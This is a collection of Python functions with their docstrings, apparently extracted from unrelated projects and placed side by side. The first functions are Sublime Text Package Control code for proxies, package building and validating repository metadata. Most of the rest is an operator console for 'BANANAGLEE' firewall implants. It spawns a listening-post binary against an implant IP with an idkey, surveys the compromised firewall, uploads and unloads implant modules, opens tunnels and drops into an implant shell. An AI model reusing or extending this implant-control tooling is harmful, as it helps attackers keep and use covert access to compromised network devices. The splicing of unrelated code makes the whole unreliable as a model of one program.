        settings = self.settings.copy()
        if ((not http_proxy) and wininet_proxy):
            settings['http_proxy'] = wininet_proxy
        if ((not https_proxy) and wininet_proxy):
            settings['https_proxy'] = wininet_proxy
        has_proxy = (settings.get('http_proxy') or settings.get('https_proxy'))
        if (has_proxy and (not proxy_username) and wininet_proxy_username):
            settings['proxy_username'] = wininet_proxy_username
        if (has_proxy and (not proxy_password) and wininet_proxy_password):
            settings['proxy_password'] = wininet_proxy_password
        self.downloader = UrlLibDownloader(settings)
        # Recurse with the replacement downloader in place
        return self.fetch(url, error_message, prefer_cached)
|
'Shows a list of packages that can be turned into a .sublime-package file'
def show_panel(self):
    """Shows a list of packages that can be turned into a .sublime-package file"""
    self.manager = PackageManager()
    # Only unpacked (folder-based) packages can be archived
    self.packages = self.manager.list_packages(unpacked_only=True)
    if (not self.packages):
        show_error(u'\n There are no packages available to be packaged\n ')
        return
    show_quick_panel(self.window, self.packages, self.on_done)
|
'Quick panel user selection handler - processes the user package
selection and prompts the user to pick a profile, or just creates the
package file if there are no profiles
:param picked:
An integer of the 0-based package name index from the presented
list. -1 means the user cancelled.'
def on_done(self, picked):
    """Handle the package quick-panel selection: prompt for a profile when
    any are configured, otherwise create the package file immediately.

    :param picked:
        An integer of the 0-based package name index from the presented
        list. -1 means the user cancelled.
    """
    self.profile = None
    if picked == -1:
        return
    self.package_name = self.packages[picked]
    rules = self.manager.settings.get('package_profiles')
    if not rules:
        # No profiles configured - build the package right away
        self.do_create_package()
        return
    self.profiles = ['Default']
    self.profiles.extend(rules.keys())
    def show_panel():
        show_quick_panel(self.window, self.profiles, self.on_done_profile)
    # Defer so the previous quick panel has time to close
    sublime.set_timeout(show_panel, 50)
|
'Quick panel user selection handler - processes the package profile
selection and creates the package file
:param picked:
An integer of the 0-based profile name index from the presented
list. -1 means the user cancelled.'
def on_done_profile(self, picked):
    """Handle the profile quick-panel selection and create the package file.

    :param picked:
        An integer of the 0-based profile name index from the presented
        list. -1 means the user cancelled.
    """
    if picked == -1:
        return
    # Index 0 is the "Default" entry, which means "no profile"
    if picked > 0:
        self.profile = self.profiles[picked]
    self.do_create_package()
|
'Calls into the PackageManager to actually create the package file'
def do_create_package(self):
    """Ask the PackageManager to build the .sublime-package file, then open
    the destination folder with the new file selected."""
    destination = self.get_package_destination()
    created = self.manager.create_package(self.package_name, destination, profile=self.profile)
    if created:
        self.window.run_command('open_dir', {'dir': destination, 'file': (self.package_name + '.sublime-package')})
|
'Retrieves the destination for .sublime-package files
:return:
A string - the path to the folder to save .sublime-package files in'
def get_package_destination(self):
    """Return the folder in which to save .sublime-package files.

    Resolution order: the selected profile's `package_destination`, then
    the global `package_destination` setting, then the user's Desktop.
    """
    destination = None
    if self.profile:
        profiles = self.manager.settings.get('package_profiles', {})
        if self.profile in profiles:
            destination = profiles[self.profile].get('package_destination')
    if not destination:
        destination = self.manager.settings.get('package_destination')
    if not destination:
        destination = os.path.join(os.path.expanduser('~'), 'Desktop')
    return destination
|
'Check the key-value pairs of a release for validity.'
def check_release_key_values(self, data, dependency):
    """Check the key-value pairs of a release for validity.

    :param data:
        The dict of one release entry
    :param dependency:
        Whether the release belongs to a dependency (stricter URL rules)
    """
    release_key_types_map = (self.dep_release_key_types_map if dependency else self.pck_release_key_types_map)
    for (k, v) in data.items():
        self.enforce_key_types_map(k, v, release_key_types_map)
        if (k == 'url'):
            if dependency:
                # Dependency downloads must be tamper-resistant: either
                # https, or plain http pinned by a sha256 hash
                if ('sha256' not in data):
                    self.assertRegex(v, '^https://')
                else:
                    self.assertRegex(v, '^http://')
            else:
                self.assertRegex(v, '^https?://')
        elif (k == 'base'):
            self.assertRegex(v, self.release_base_regex, 'The base url is badly formatted or invalid')
        elif (k == 'sublime_text'):
            self.assertRegex(v, '^(\\*|<=?\\d{4}|>=?\\d{4}|\\d{4} - \\d{4})$', 'sublime_text must be `*`, of the form `<relation><version>` where <relation> is one of {<, <=, >, >=} and <version> is a 4 digit number, or of the form `<version> - <version>`')
        elif (k == 'platforms'):
            # A single platform string is allowed as shorthand for a list
            if isinstance(v, str_cls):
                v = [v]
            for plat in v:
                self.assertRegex(plat, '^(\\*|(osx|linux|windows)(-x(32|64))?)$')
        elif (k == 'date'):
            self.assertRegex(v, '^\\d\\d\\d\\d-\\d\\d-\\d\\d \\d\\d:\\d\\d:\\d\\d$')
        # NOTE: duplicate `elif k == 'url'` / `elif k == 'base'` branches
        # that re-checked keys already handled at the top of this chain
        # were unreachable and have been removed.
        elif (k == 'tags'):
            self.assertTrue(bool(v), '"tags" must be `true` or a string of length>0')
            if isinstance(v, str_cls):
                self.assertFalse((v == 'true'), 'It is unlikely to specify the prefix "true" use not the boolean `true`')
        elif (k == 'branch'):
            self.assertNotEqual(v, '', '"branch" must be non-empty')
        elif (k == 'sha256'):
            self.assertRegex(v, '(?i)^[0-9a-f]{64}$')
|
'A generic error-returning function used by the meta-programming features
of this class.
:param msg:
The error message to return
:param e:
An optional exception to include with the error message'
| def _test_error(self, msg, e=None):
| if e:
if isinstance(e, HTTPError):
self.fail(('%s: %s' % (msg, e)))
else:
self.fail(('%s: %r' % (msg, e)))
else:
self.fail(msg)
|
'Yields tuples of (method, args) to add to a unittest TestCase class.
A meta-programming function to expand the definition of class at run
time, based on the contents of a file or URL.
:param cls:
The class to add the methods to
:param path:
The URL or file path to fetch the repository info from
:param stream:
A file-like object used for diagnostic output that provides .write()
and .flush()'
@classmethod
def _include_tests(cls, path, stream):
    """Yields tuples of (method, args) to add to a unittest TestCase class.

    A meta-programming function to expand the definition of class at run
    time, based on the contents of a file or URL.

    :param path:
        The URL or file path to fetch the repository info from
    :param stream:
        A file-like object used for diagnostic output that provides .write()
        and .flush()
    """
    stream.write(('%s ... ' % path))
    stream.flush()
    success = False
    try:
        # Fetch the repository JSON from a URL or a local file
        if (re.match('https?://', path, re.I) is not None):
            try:
                f = urlopen(path)
                source = f.read()
                f.close()
            except Exception as e:
                # Defer the failure so it surfaces when tests run
                (yield cls._fail(('Downloading %s failed' % path), e))
                return
            source = source.decode('utf-8', 'strict')
        else:
            try:
                with _open(path) as f:
                    source = f.read().decode('utf-8', 'strict')
            except Exception as e:
                (yield cls._fail(('Opening %s failed' % path), e))
                return
        if (not source):
            (yield cls._fail(('%s is empty' % path)))
            return
        try:
            data = json.loads(source)
        except Exception as e:
            (yield cls._fail(('Could not parse %s' % path), e))
            return
        if ('schema_version' not in data):
            (yield cls._fail(('No schema_version found in %s' % path)))
            return
        schema = data['schema_version']
        if ((schema != '3.0.0') and (float(schema) not in (1.0, 1.1, 1.2, 2.0))):
            (yield cls._fail(('Unrecognized schema version %s in %s' % (schema, path))))
            return
        success = True
        # Only schema 3.0.0 repositories are tested; older ones are counted
        if (schema != '3.0.0'):
            stream.write(('skipping (schema version %s)' % data['schema_version']))
            cls.skipped_repositories[schema] += 1
            return
        else:
            stream.write('done')
    finally:
        # Always finish the diagnostic line, marking failure when needed
        if (not success):
            stream.write('failed')
        stream.write('\n')
    (yield (cls._test_repository_keys, (path, data)))
    if ('packages' in data):
        for package in data['packages']:
            (yield (cls._test_package, (path, package)))
            package_name = get_package_name(package)
            if ('releases' in package):
                for release in package['releases']:
                    (yield (cls._test_release, (('%s (%s)' % (package_name, path)), release, False, False)))
    # Recurse into any included repository files
    if ('includes' in data):
        for include in data['includes']:
            i_url = urljoin(path, include)
            for test in cls._include_tests(i_url, stream):
                (yield test)
|
'Generates a (method, args) tuple that returns an error when called.
Allows for defering an error until the tests are actually run.'
@classmethod
def _fail(cls, *args):
    """Generates a (method, args) tuple that returns an error when called.

    Allows for deferring an error until the tests are actually run.
    """
    return (cls._test_error, args)
|
'Writes diagnostic output to a file-like object.
:param stream:
Must have the methods .write() and .flush()
:param string:
The string to write - a newline will NOT be appended'
@classmethod
def _write(cls, stream, string):
    """Writes diagnostic output to a file-like object.

    :param stream:
        Must have the methods .write() and .flush()
    :param string:
        The string to write - a newline will NOT be appended
    """
    stream.write(string)
    stream.flush()
|
def do_set_tunnel(self, option):
    """set_tunnel [True|False]
    sets if the script will handle tunneling for you"""
    choice = option.lower()
    # Anything other than the two recognized words is rejected outright.
    if choice not in ('true', 'false'):
        self.logger.error('You made an invalid selection')
        return
    enabled = (choice == 'true')
    if enabled:
        self.logger.info('Script will handle tunneling for you')
    else:
        self.logger.info('Script will not handle tunneling for you')
    self.sfile['do_tunnel'] = enabled
|
def do_set_shelve(self, option):
    """set_shelve [KEY] [VALUE]
    sets KEY to VALUE in the shelve file"""
    self.logger.debug('user ran set_shelve')
    # Split on the first space only: the value may itself contain spaces.
    key, sep, value = option.partition(' ')
    if sep == '':
        self.logger.error('could not determine your key and value')
        return
    if key == '':
        self.logger.error('could not determine your key')
        return
    if value == '':
        self.logger.error('could not determine your value')
        return
    # BUG FIX: dict.has_key() was removed in Python 3 (and deprecated in
    # Python 2); the "in" operator is the portable, equivalent spelling.
    if key in self.sfile:
        self.sfile[key] = value
        self.logger.info('Updating shelve file')
    else:
        self.logger.error('key does not exist, creating')
        self.sfile[key] = value
    # Both branches report what was stored; hoisted out of the duplicate code.
    self.logger.info('Key: ' + str(key))
    self.logger.info('Value: ' + str(value))
|
def do_show_settings(self, option):
    """show_settings
    displays all of the current configuration settings"""
    # Record the command, then delegate to the shared settings printer.
    self.logger.debug('user ran show_settings')
    tools.show_settings(self.sfile, option, self.logger)
|
def do_show_tools(self, option):
    """show_tools
    shows the support tools and versions"""
    self.logger.debug('user ran show_tools')
    # The [main] section lists the supported tools as a comma-separated string;
    # each tool then has its own section with a 'versions' option.
    tool_names = self.config.get('main', 'tools').split(',')
    for tool_name in tool_names:
        versions = self.config.get(tool_name, 'versions')
        self.logger.info('tool : ' + str(tool_name))
        self.logger.info('versions : ' + str(versions))
|
def do_bananaglee(self, version):
    """bananaglee [VERSION]
    selects the bananaglee VERSION to use"""
    self.logger.debug('user ran bananaglee')
    # Guard clauses: require a version and require that it is a known one.
    if version == '':
        self.logger.error('please specify a version')
        return
    if version not in self.bg_versions:
        self.logger.error('made an invalid selection: ' + str(version))
        return
    self.logger.debug('selected bananaglee ' + str(version))
    self.sfile['tool'] = 'bananaglee'
    self.sfile['version'] = version
    # Hand control to the BANANAGLEE sub-shell until the user quits it.
    bananaglee_mod = bananaglee.BananaGlee(self.sfile, self.logger)
    bananaglee_mod.cmdloop()
|
def do_add_iprange(self, input):
    """add_iprange [IP NETMASK] or [IP/CIDR]
    adds an IP range to use for tunneling"""
    self.logger.debug('user ran add_iprange')
    # tools.cidr parses the range and stores it under sfile['iprange'].
    tools.cidr(self.sfile, self.logger, input)
    self.logger.debug('output from cidr')
    self.logger.debug(self.sfile['iprange'])
|
def do_show_iprange(self, input):
    """show_iprange
    will print out all the IPs to use for communication"""
    self.logger.debug('user ran show_iprange')
    # BUG FIX: dict.has_key() was removed in Python 3; "in" is the portable
    # equivalent of the original has_key(...) == False check.
    if 'iprange' not in self.sfile:
        self.logger.info('I do not have any IPs to use for communication')
    else:
        self.logger.info(self.sfile['iprange'])
|
def do_delete_iprange(self, input):
    """delete_iprange
    deletes all the IPs to use for communication"""
    self.logger.debug('user ran delete_iprange')
    # BUG FIX: dict.has_key() was removed in Python 3; "in" is the portable
    # equivalent. Early-return keeps the happy path unindented.
    if 'iprange' not in self.sfile:
        self.logger.info('I do not have any IPs to use for communication')
        return
    self.logger.debug('current IPs in list: ')
    self.logger.debug(self.sfile['iprange'])
    self.logger.info('removing all IPs')
    self.sfile['iprange'] = []
    self.logger.debug('empty ip list: ' + str(self.sfile['iprange']))
|
def do_exit(self, line):
    """exit
    exits the program"""
    # Clear all auto-pilot flags so the next session starts interactive.
    for flag in ('auto', 'auto_start', 'auto_end'):
        self.sfile[flag] = False
    self.logger.debug('exiting')
    self.logger.debug(self.sfile)
    # Persist the shelve before terminating the whole process.
    self.sfile.close()
    sys.exit()
|
def do_quit(self, line):
    """quit
    quits the current context"""
    # Clear all auto-pilot flags before leaving this sub-shell.
    for flag in ('auto', 'auto_start', 'auto_end'):
        self.sfile[flag] = False
    self.logger.debug('exiting')
    self.logger.debug(self.sfile)
    self.sfile.close()
    # Returning True tells cmd.Cmd.cmdloop() to stop.
    return True
|
def __init__(self, shelve_file, logger):
    """Initialize the BANANAGLEE interactive sub-shell.

    :param shelve_file:
        An open shelve (persistent dict-like object) carrying session
        state: tool/version selection, target info, paths and flags.
    :param logger:
        A configured logger used for all diagnostic and user output.
    """
    cmd.Cmd.__init__(self)
    self.sfile = shelve_file
    # NOTE(review): 'name' is computed here but never used afterwards.
    name = ('bananaglee' + self.sfile['version'])
    self.logger = logger
    # Prompt reflects the selected BG version, e.g. "BG1.0>>".
    self.prompt = (('BG' + self.sfile['version']) + '>>')
    self.logger.debug('sfile contents:')
    for i in self.sfile:
        self.logger.debug(((i + ' : ') + str(self.sfile[i])))
    # tools.cfg maps each tool+version to its LP binary and command IDs.
    self.tools_config = ConfigParser.ConfigParser()
    self.tools_config.read(os.path.join(self.sfile['script_dir'], 'tools.cfg'))
    try:
        # Resolve the LP binary path for the selected tool/version.
        self.sfile['lp_bin'] = self.tools_config.get((str(self.sfile['tool']) + str(self.sfile['version'])), 'lp')
    except:
        self.logger.debug(('could not get lp from banananaglee' + str(self.sfile['version'])))
    self.sfile['timestamp'] = tools.timeStamp()
    (self.sfile['lp_dir'], tmp) = os.path.split(self.sfile['lp_bin'])
    # Per-target directory where raw LP session logs accumulate.
    self.sfile['logs_to_process'] = os.path.join(self.sfile['log_dir'], ((self.sfile['hostname'] + '.') + self.sfile['target']))
    self.sfile['logfile'] = os.path.join(self.sfile['log_dir'], (((('BG_log_' + str(self.sfile['hostname'])) + '.') + str(self.sfile['target'])) + '.log'))
    if (not os.path.exists(self.sfile['logs_to_process'])):
        os.makedirs(self.sfile['logs_to_process'])
    # Default connection parameters when not already persisted.
    # (has_key is Python-2-only; kept as-is in this documentation pass.)
    if (self.sfile.has_key('lp') == True):
        self.logger.debug('lp ip already exists')
    else:
        self.sfile['lp'] = '127.0.0.1'
    if (self.sfile.has_key('implant') == True):
        self.logger.debug('implant ip already exists')
    else:
        self.sfile['implant'] = '127.0.0.1'
    if (self.sfile.has_key('idkey') == True):
        self.logger.debug('idkey already exists')
        if (os.path.isfile(self.sfile['idkey']) == False):
            self.logger.error(('Your keyfile does not exist at: ' + str(self.sfile['idkey'])))
    else:
        self.sfile['idkey'] = 'idkey'
    # Fresh source/destination ports for this session.
    self.sfile['sport'] = tools.newPort()
    self.sfile['dport'] = tools.newPort()
    # NOTE(review): 'timestamp' was just overwritten a few lines above, so
    # this date comparison is effectively always equal; it looks like it was
    # meant to compare against the PREVIOUS run's timestamp to invalidate a
    # stale survey — confirm intent before changing.
    if (tools.timeStamp().split('_')[0] == self.sfile['timestamp'].split('_')[0]):
        pass
    else:
        self.sfile['survey'] = False
    self.logger.info(('starting bananaglee ' + self.sfile['version']))
    self.logger.info(('LP IP: ' + self.sfile['lp']))
    self.logger.info(('Implant IP: ' + self.sfile['implant']))
    self.logger.info(('IDKey : ' + self.sfile['idkey']))
    self.logger.debug(('Source Port: ' + str(self.sfile['sport'])))
    self.logger.debug(('Destination Port: ' + str(self.sfile['dport'])))
    # The LP binary is executed from its own directory.
    os.chdir(self.sfile['lp_dir'])
    if (self.sfile.has_key('uploaded_mod_list') == True):
        self.uploaded_mod_list = self.sfile['uploaded_mod_list']
    else:
        self.uploaded_mod_list = []
    if (self.sfile.has_key('persistent_modules') == False):
        self.sfile['persistent_modules'] = []
    # Auto-pilot mode: run a scripted start or teardown sequence instead of
    # waiting for interactive commands.
    if (self.sfile['auto'] == True):
        if (self.sfile['auto_start'] == True):
            # Scripted start: survey, ensure PTK is loaded, open the tunnel.
            self.do_survey(' ')
            if ('packetToolkit' in self.sfile['uploaded_mod_list']):
                self.logger.info('PTK is already here')
                self.sfile['auto_PTK'] = False
            else:
                self.logger.info('PTK not present, uploading')
                self.sfile['auto_PTK'] = True
                self.do_load('packetToolkit')
            self.sfile['tunnel'] = True
            print self.sfile['tunnel']
            print self.sfile['current_rule']
            tunnel_mod = tunnel.Tunnel(self.sfile, self.logger)
            tunnel_mod.cmdloop()
            self.do_quit(' ')
        elif (self.sfile['auto_end'] == True):
            # Scripted teardown: unload PTK unless marked persistent, then
            # reset the auto flags and terminate the process.
            self.do_set_survey(' ')
            if ('packetToolkit' in self.sfile['persistent_modules']):
                self.logger.info('PTK is a persistent module')
            else:
                self.logger.info('unloading PTK')
                self.do_unload('packetToolkit')
            tools.resetAuto(self.sfile, self.logger)
            sys.exit()
|
def do_show_settings(self, option):
    """show_settings
    prints out the current settings"""
    # Delegate straight to the shared settings printer.
    tools.show_settings(self.sfile, option, self.logger)
|
def do_survey(self, line):
    """survey - performs a survey, interface info/config/arp

    Drives an interactive session with the LP binary via pexpect, tees the
    whole dialogue into a numbered firewall log file, then scrapes that log
    to extract the implant ID, OS/implant versions, uptime, interface info,
    loaded modules and the list of uploadable modules.
    """
    self.logger.debug('user ran survey')
    self.logger.info('running survey')
    # Abort unless all required connection settings are present.
    if (tools.checks(self.sfile, self.logger) == False):
        print tools.show_settings(self.sfile, ' ')
        self.logger.error('missing required parameters')
        return False
    tunnel_number = tools.openTunnel(self.sfile, self.logger)
    # Build the LP command line from the stored session settings.
    command = ((((((((((((str(self.sfile['lp_bin']) + ' --lp ') + str(self.sfile['lp'])) + ' --implant ') + str(self.sfile['implant'])) + ' --idkey ') + str(self.sfile['idkey'])) + ' --sport ') + str(self.sfile['sport'])) + ' --dport ') + str(self.sfile['dport'])) + ' --logdir ') + self.sfile['logs_to_process'])
    self.logger.debug(str(command))
    # Find the first <host>.<target>_BG_survey_<N>_firewall.log not yet taken.
    temp_counter = 0
    found_file = False
    while (found_file == False):
        if (os.path.isfile(os.path.join(self.sfile['log_dir'], (((((self.sfile['hostname'] + '.') + self.sfile['target']) + '_BG_survey_') + str(temp_counter)) + '_firewall.log'))) == True):
            temp_counter += 1
        else:
            logfile = os.path.join(self.sfile['log_dir'], (((((self.sfile['hostname'] + '.') + self.sfile['target']) + '_BG_survey_') + str(temp_counter)) + '_firewall.log'))
            found_file = True
    child = pexpect.spawn(command)
    # file() is the Python-2 builtin; all session output is teed to this log.
    plogfile = file(logfile, 'a')
    child.logfile = plogfile
    self.logger.info('parsing results, please wait')
    self.logger.info(('You can check ' + str(logfile)))
    '\n DCTB DCTB Add error handling:\n DCTB DCTB timeout issues\n DCTB DCTB talking to wrong version\n DCTB DCTB '
    # (The bare string above is a leftover author TODO note; kept as-is.)
    try:
        # Menu dialogue with the LP binary — the numbers are menu choices;
        # 'BG#' is the LP prompt we wait for between commands.
        child.sendline('1')
        child.expect('BG#', timeout=120)
        child.sendline('10')
        child.expect('BG#', timeout=120)
        child.sendline('11')
        child.expect('BG#', timeout=120)
        child.sendline('12')
        child.expect('BG#', timeout=120)
        child.sendline('31')
        child.sendline('q')
        child.expect('BG#', timeout=120)
        child.sendline('9')
        child.expect('BG#', timeout=120)
        child.sendline('0')
    except:
        self.logger.exception('survey failed out')
    # Re-read the log we just wrote and scan for the section markers.
    with open(logfile, 'r') as f:
        output = f.readlines()
    c = 0
    mod_start = 0
    uptime = 0
    # NOTE(review): 'mod_list' is initialized here but 'mod_list_start' is
    # what is read below — if the '###...' marker never appears, the
    # 'if (mod_list_start != 0)' test raises a NameError. Likewise
    # implant_id / os_version / implant_version / int_start are only bound
    # when their marker lines are found. Confirm against real LP output.
    mod_list = 0
    for i in output:
        self.logger.debug(str(i.rstrip('\r\n')))
        if ('Connection Established to Implant' in i):
            implant_id = c
            self.logger.debug(('found implant id at ' + str(c)))
            self.logger.debug(str(i))
        elif ('OS Version' in i):
            os_version = c
            self.logger.debug(('found the os version at ' + str(c)))
            self.logger.debug(str(i))
        elif ('Implant Version' in i):
            implant_version = c
            self.logger.debug(('found the implant version at ' + str(c)))
            self.logger.debug(str(i))
        elif ('Uptime' in i):
            uptime = c
            self.logger.debug(('found the uptime at ' + str(c)))
            self.logger.debug(str(i))
        elif ('Printing the interface info and security levels' in i):
            int_start = c
            self.logger.debug(('found the start of the interface info at ' + str(c)))
            self.logger.debug(str(i))
        elif ('Module Name Version' in i):
            mod_start = c
            self.logger.debug(('found the start of module info at ' + str(c)))
            self.logger.debug(str(i))
        elif ('###################' in i):
            mod_list_start = (c + 4)
            self.logger.debug(('found the start of the module list at ' + str((c + 4))))
            self.logger.debug(i)
        c += 1
    # Each section ends at the next 'BG#' prompt within a 20-line window.
    int_end_tmp = 0
    for i in output[int_start:(int_start + 20)]:
        if ('BG#' in i):
            int_end = (int_end_tmp + int_start)
            self.logger.debug(('found the end of the interface information at ' + str(int_end)))
            self.logger.debug(str(i))
        else:
            int_end_tmp += 1
    if (mod_start != 0):
        mod_end_tmp = 0
        for i in output[mod_start:(mod_start + 20)]:
            if ('BG#' in i):
                mod_end = (mod_end_tmp + mod_start)
                self.logger.debug(('found the end of the loaded modules at ' + str(mod_end)))
                self.logger.debug(str(i))
            else:
                mod_end_tmp += 1
    if (mod_list_start != 0):
        mod_list_end_temp = 0
        for i in output[mod_list_start:(mod_list_start + 20)]:
            if ('# Select' in i):
                mod_list_end = (mod_list_end_temp + mod_list_start)
                self.logger.debug(('found the end of the module list at ' + str(mod_list_end)))
                self.logger.debug(str(i))
            else:
                mod_list_end_temp += 1
    module_list = output[mod_list_start:mod_list_end]
    uploaded_modlist_tmp = []
    # Report the parsed sections; each block is best-effort and logged on
    # failure rather than aborting the whole survey.
    self.logger.info('Survey Information')
    try:
        self.logger.info((' Implant ID: ' + str(output[implant_id].split(' ')[4]).rstrip('\r\n')))
    except:
        self.logger.exception('could not determine the implant id')
    try:
        self.logger.info(output[os_version].rstrip('\r\n'))
    except:
        self.logger.exception('could not determine the OS')
    try:
        self.logger.info(output[implant_version].rstrip('\r\n'))
    except:
        self.logger.exception('could not determine the implant version')
    try:
        if (uptime != 0):
            self.logger.info(output[uptime].rstrip('\r\n'))
    except:
        self.logger.exception('could not determine the uptime')
    try:
        if (mod_start != 0):
            # Collect names of modules already uploaded to the implant.
            module_info = output[mod_start:mod_end]
            end = False
            for i in module_info[:(-1)]:
                for j in i.split(' '):
                    if (j in self.sfile['mod_num_dict']):
                        uploaded_modlist_tmp.append(j)
                if ('BG#' in i):
                    end = True
                if (end == False):
                    self.logger.info(i.rstrip('\r\n'))
        else:
            self.logger.info('No modules are currently uploaded')
    except:
        self.logger.exception('could not get the module information')
    try:
        # NOTE(review): interface_info_out is built but never populated/used.
        interface_info = output[int_start:(int_end + 1)]
        interface_info_out = []
        for i in interface_info:
            self.logger.info(i.rstrip('\r\n'))
    except:
        self.logger.exception('could not get the interface information')
    try:
        # Build the name -> menu-number map for uploadable modules.
        mod_num_dict = {}
        self.logger.info('List of modules that can be uploaded')
        for i in module_list:
            format = i.rstrip('\r\n')[1:]
            mod_array = filter(None, format.split(' '))
            if (len(mod_array) == 3):
                self.logger.info(mod_array[1])
                number = mod_array[0]
                # Strip the trailing ')' (or similar) from the menu number.
                mod_num_dict[mod_array[1]] = number[:(-1)]
        self.logger.debug(mod_num_dict)
        self.sfile['mod_num_dict'] = mod_num_dict
        # Ensure each known module has a (possibly empty) command-ID dict.
        for i in mod_num_dict:
            if (self.sfile.has_key(i) == False):
                self.sfile[i] = {}
    except:
        self.logger.exception('could not build module dictonary')
    self.sfile['uploaded_mod_list'] = uploaded_modlist_tmp
    plogfile.close()
    self.sfile['survey'] = True
    tools.closeTunnel(self.sfile, tunnel_number, self.logger)
|
def do_show_uploadable_modules(self, option):
    """show_uploadable_modules
    displays the modules that can be uploaded"""
    self.logger.debug('user ran show_uploadable_modules')
    self.logger.info('List of modules that can be uploaded')
    # mod_num_dict is populated by the survey; reading it can fail if the
    # shelve has never been surveyed, hence the broad guard.
    try:
        module_names = self.sfile['mod_num_dict']
        for module_name in module_names:
            self.logger.info(module_name)
    except:
        self.logger.exception('could not read mod_num_dict from shelve')
|
def do_tunnel(self, option):
    """tunnel [OPTION]
    calls program to manage tunnels
    option: simple advanced"""
    self.logger.debug('user ran tunnel')
    # Guard clauses: a completed survey and an uploaded PTK are prerequisites.
    if self.sfile['survey'] == False:
        self.logger.error('survey had not been completed, please run survey')
        return
    if 'packetToolkit' not in self.sfile['uploaded_mod_list']:
        self.logger.error('your tunnel module is not uploaded')
        return
    # NB: the raw option is logged before it is normalized below.
    self.logger.info('Starting tunnel in ' + str(option) + ' mode')
    mode = 'simple' if option in ('', 'simple') else 'advanced'
    self.sfile['mode'] = mode
    tunnel_mod = tunnel.Tunnel(self.sfile, self.logger)
    tunnel_mod.cmdloop()
|
def do_unload(self, module):
    """unload [module]
    deactivates and removes a module"""
    self.logger.debug('user ran unload ' + str(module))
    if self.sfile['survey'] == False:
        self.logger.error('survey had not been completed, please run survey')
        return
    if module not in self.sfile['uploaded_mod_list']:
        self.logger.error('module: ' + str(module) + ' is not an uploaded module')
        self.logger.info('Current uploaded modules are: ')
        if len(self.sfile['uploaded_mod_list']) == 0:
            self.logger.info('I do not know of any uploaded modules')
        else:
            for i in self.sfile['uploaded_mod_list']:
                self.logger.info(i)
        return
    # Implant-side command ID for this module, looked up in tools.cfg.
    command_id = self.tools_config.get('bananaglee' + str(self.sfile['version']), module + '_ID')
    self.logger.debug('command id: ' + str(command_id))
    self.logger.info('unloading the ' + str(module) + ' module')
    tunnel_number = tools.openTunnel(self.sfile, self.logger)
    command = (str(self.sfile['lp_bin']) + ' --lp ' + str(self.sfile['lp']) + ' --implant ' + str(self.sfile['implant']) + ' --idkey ' + str(self.sfile['idkey']) + ' --sport ' + str(self.sfile['sport']) + ' --dport ' + str(self.sfile['dport']) + ' --logdir ' + str(self.sfile['logs_to_process']))
    self.logger.debug(command)
    # Pick the first <host>.<target>BG_shell<N>.log name not yet taken.
    temp_counter = 0
    while True:
        log_file = os.path.join(self.sfile['log_dir'], self.sfile['hostname'] + '.' + self.sfile['target'] + 'BG_shell' + str(temp_counter) + '.log')
        if not os.path.isfile(log_file):
            break
        temp_counter += 1
    self.logger.debug('log file: ' + log_file)
    child = pexpect.spawn(command)
    # BUG FIX: file() is a Python-2-only builtin; open() is the portable
    # spelling with identical behavior here.
    logfile = open(log_file, 'a')
    child.logfile = logfile
    # Menu dialogue with the LP binary; '33 <id> 34 <id>' appears to
    # deactivate then remove the module — confirm against the LP menu.
    try:
        child.sendline('1')
        child.expect('BG#', timeout=120)
        child.sendline('33 ' + str(command_id) + ' 34 ' + str(command_id))
        child.expect('BG#', timeout=180)
        child.sendline('36')
        child.expect('BG#', timeout=120)
        child.sendline('9')
        child.expect('BG#', timeout=120)
        child.sendline('0')
    except:
        self.logger.exception('unload ' + str(module) + ' failed')
    tools.closeTunnel(self.sfile, tunnel_number, self.logger)
    logfile.close()
    # BUG FIX: the original popped entries out of the list while iterating
    # over it, which skips the element following each removal; rebuilding
    # the list removes every occurrence safely.
    self.sfile['uploaded_mod_list'] = [m for m in self.sfile['uploaded_mod_list'] if m != module]
|
def do_show_uploaded_modules(self, line):
    """show_uploaded_modules [connect]
    returns the modules that are currently uploaded
    if connect is used a connection to the firewall will be made"""
    # With no argument, just report the cached list from the last survey.
    if (line == ''):
        self.logger.info('modules that are currently loaded')
        for mod in self.sfile['uploaded_mod_list']:
            self.logger.info(str(mod))
    # Any argument starting with 'c' queries the firewall live.
    elif (line[0].lower() == 'c'):
        tunnel_number = tools.openTunnel(self.sfile, self.logger)
        command = ((((((((((((str(self.sfile['lp_bin']) + ' --lp ') + str(self.sfile['lp'])) + ' --implant ') + str(self.sfile['implant'])) + ' --idkey ') + str(self.sfile['idkey'])) + ' --sport ') + str(self.sfile['sport'])) + ' --dport ') + str(self.sfile['dport'])) + ' --logdir ') + self.sfile['logs_to_process'])
        child = pexpect.spawn(command)
        # Pick the first BG_shell<N>.log name not already taken.
        temp_counter = 0
        found_file = False
        while (found_file == False):
            if (os.path.isfile(os.path.join(self.sfile['log_dir'], (((((self.sfile['hostname'] + '.') + self.sfile['target']) + 'BG_shell') + str(temp_counter)) + '.log'))) == True):
                temp_counter += 1
            else:
                log_file = os.path.join(self.sfile['log_dir'], (((((self.sfile['hostname'] + '.') + self.sfile['target']) + 'BG_shell') + str(temp_counter)) + '.log'))
                found_file = True
        # NOTE(review): file() is Python-2-only, and this handle is never
        # closed on this code path.
        logfile = file(log_file, 'a')
        child.logfile = logfile
        # Menu dialogue: '36' lists loaded modules, then back out and quit.
        try:
            child.sendline('1')
            child.expect('BG#', timeout=120)
            child.sendline('36')
            child.expect('BG#', timeout=180)
            child.sendline('9')
            child.expect('BG#', timeout=120)
            child.sendline('0')
        except:
            self.logger.exception('Could not list out uploaded modules')
        self.logger.info('uploaded modules')
        # child.before holds the output captured before the last match.
        for i in child.before.split('\r\n'):
            self.logger.info(i)
        tools.closeTunnel(self.sfile, tunnel_number, self.logger)
|
def do_shell(self, module):
    """shell
    drops user to a BANANAGLEE shell"""
    self.logger.debug('user ran shell')
    tunnel_number = tools.openTunnel(self.sfile, self.logger)
    command = ((((((((((((str(self.sfile['lp_bin']) + ' --lp ') + str(self.sfile['lp'])) + ' --implant ') + str(self.sfile['implant'])) + ' --idkey ') + str(self.sfile['idkey'])) + ' --sport ') + str(self.sfile['sport'])) + ' --dport ') + str(self.sfile['dport'])) + ' --logdir ') + self.sfile['logs_to_process'])
    child = pexpect.spawn(command)
    # Pick the first BG_shell<N>.log name not already taken.
    temp_counter = 0
    found_file = False
    while (found_file == False):
        if (os.path.isfile(os.path.join(self.sfile['log_dir'], (((((self.sfile['hostname'] + '.') + self.sfile['target']) + 'BG_shell') + str(temp_counter)) + '.log'))) == True):
            temp_counter += 1
        else:
